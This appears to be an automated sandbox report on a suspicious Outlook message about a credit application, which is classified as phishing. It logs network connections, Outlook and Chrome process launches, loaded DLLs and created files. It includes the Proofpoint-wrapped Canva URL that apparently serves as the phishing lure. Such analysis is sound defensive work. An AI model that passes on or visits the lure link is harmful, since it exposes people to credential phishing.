Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
Source: unknownHTTPS traffic detected: 40.126.32.133:443 -> 192.168.2.17:49707 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49708 version: TLS 1.2
Source: unknownHTTPS traffic detected: 51.104.136.2:443 -> 192.168.2.17:49755 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.190.159.71:443 -> 192.168.2.17:49756 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.17:49757 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.17:49759 version: TLS 1.2
Source: unknownHTTPS traffic detected: 4.231.128.59:443 -> 192.168.2.17:49761 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.17:49763 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.73.194.208:443 -> 192.168.2.17:49764 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.114.59.183:443 -> 192.168.2.17:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 40.126.32.133:443 -> 192.168.2.17:49766 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49767 version: TLS 1.2
Source: unknownHTTPS traffic detected: 2.23.209.162:443 -> 192.168.2.17:49768 version: TLS 1.2
Source: classification engineClassification label: mal48.phis.winMSG@31/108@102/290
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\Documents\Outlook Files\~Outlook Data File - NoEmail.pst.tmp
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile created: C:\Users\user\AppData\Local\Temp\Outlook Logging\OUTLOOK_16_0_16827_20130-20240823T1001070563-6780.etl
Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\FW_ SLS properties Credit application.msg"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "596D25AB-B66E-4175-A155-48EB7DB6500E" "6D46B4B3-AA18-4D8C-B7BC-95B0F75ACEFD" "6780" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe "C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "596D25AB-B66E-4175-A155-48EB7DB6500E" "6D46B4B3-AA18-4D8C-B7BC-95B0F75ACEFD" "6780" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx"
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://urldefense.proofpoint.com/v2/url?u=https-3A__www.canva.com_design_DAGOmfvTQik_JOV039GfGLa9-2DL3q9YZIrQ_view-3Futm-5Fcontent-3DDAGOmfvTQik-26utm-5Fcampaign-3Ddesignshare-26utm-5Fmedium-3Dlink-26utm-5Fsource-3Deditor&d=DwMGaQ&c=euGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM&r=_q-s3QiVuOPjtHJaJVkKfweCaffZ83--RRmzYLW5xz8&m=mdW_iTAcERmykitoq0JvIEABLskmQdaEglbGg99bNm-8JYwQDx66eHAvBVhOGzWR&s=7BTLf4d7joI8hUOD4oRSjtHYMyv5oKmd9mD0yG-l0R8&e=
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2032,i,11468769275569357622,9191283708130019680,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://urldefense.proofpoint.com/v2/url?u=https-3A__www.canva.com_design_DAGOmfvTQik_JOV039GfGLa9-2DL3q9YZIrQ_view-3Futm-5Fcontent-3DDAGOmfvTQik-26utm-5Fcampaign-3Ddesignshare-26utm-5Fmedium-3Dlink-26utm-5Fsource-3Deditor&d=DwMGaQ&c=euGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM&r=_q-s3QiVuOPjtHJaJVkKfweCaffZ83--RRmzYLW5xz8&m=mdW_iTAcERmykitoq0JvIEABLskmQdaEglbGg99bNm-8JYwQDx66eHAvBVhOGzWR&s=7BTLf4d7joI8hUOD4oRSjtHYMyv5oKmd9mD0yG-l0R8&e=
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2032,i,11468769275569357622,9191283708130019680,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://urldefense.proofpoint.com/v2/url?u=https-3A__www.canva.com_design_DAGOmfvTQik_JOV039GfGLa9-2DL3q9YZIrQ_view-3Futm-5Fcontent-3DDAGOmfvTQik-26utm-5Fcampaign-3Ddesignshare-26utm-5Fmedium-3Dlink-26utm-5Fsource-3Deditor&d=DwMGaQ&c=euGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM&r=_q-s3QiVuOPjtHJaJVkKfweCaffZ83--RRmzYLW5xz8&m=mdW_iTAcERmykitoq0JvIEABLskmQdaEglbGg99bNm-8JYwQDx66eHAvBVhOGzWR&s=7BTLf4d7joI8hUOD4oRSjtHYMyv5oKmd9mD0yG-l0R8&e=
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1908,i,17427697382459923548,16447669437909309874,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://urldefense.proofpoint.com/v2/url?u=https-3A__www.canva.com_design_DAGOmfvTQik_JOV039GfGLa9-2DL3q9YZIrQ_view-3Futm-5Fcontent-3DDAGOmfvTQik-26utm-5Fcampaign-3Ddesignshare-26utm-5Fmedium-3Dlink-26utm-5Fsource-3Deditor&d=DwMGaQ&c=euGZstcaTDllvimEN8b7jXrwqOf-v5A_CdpgnVfiiMM&r=_q-s3QiVuOPjtHJaJVkKfweCaffZ83--RRmzYLW5xz8&m=mdW_iTAcERmykitoq0JvIEABLskmQdaEglbGg99bNm-8JYwQDx66eHAvBVhOGzWR&s=7BTLf4d7joI8hUOD4oRSjtHYMyv5oKmd9mD0yG-l0R8&e=
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1908,i,17427697382459923548,16447669437909309874,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5800 --field-trial-handle=2032,i,11468769275569357622,9191283708130019680,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5800 --field-trial-handle=2032,i,11468769275569357622,9191283708130019680,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: apphelp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: c2r64.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: userenv.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: msasn1.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: kernel.appcore.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptsp.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: rsaenh.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: cryptbase.dll
Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeSection loaded: gpapi.dll
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
